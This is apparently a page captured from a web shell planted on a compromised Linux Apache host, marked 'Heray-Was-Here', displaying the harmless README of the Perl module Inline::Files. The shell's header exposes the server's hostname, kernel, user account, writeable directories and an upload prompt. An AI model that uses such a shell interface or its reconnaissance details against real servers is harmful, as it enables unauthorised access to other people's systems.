Heray-Was-Here
Server : Apache
System : Linux vps103298.mylogin.co 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : calvet ( 273824)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /usr/share/doc/perl-Inline-Files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/doc/perl-Inline-Files/README
==============================================================================
                         Release of Inline::Files
==============================================================================


NAME
    Inline::File - Multiple virtual files at the end of your code

SYNOPSIS

    use Inline::Files;

    my Code $here;

    while (<FOO>) { print }

    # etc.

    __FOO__
    This is a virtual file at the end
    of the data
        
    __BAR__
    This is another
    virtual

    file
    __FOO__
    This is yet another 
    such file

DESCRIPTION
    Inline::Files generalizes the notion of the `__DATA__' marker and the
    associated `<DATA>' filehandle, to an arbitrary number of markers and
    associated filehandles.

    When you add the line:

            use Inline::Files;

    to a source file you can then specify an arbitrary number of
    distinct virtual files at the end of the code.

AUTHOR
    Damian Conway (damian@conway.org)


==============================================================================

Hry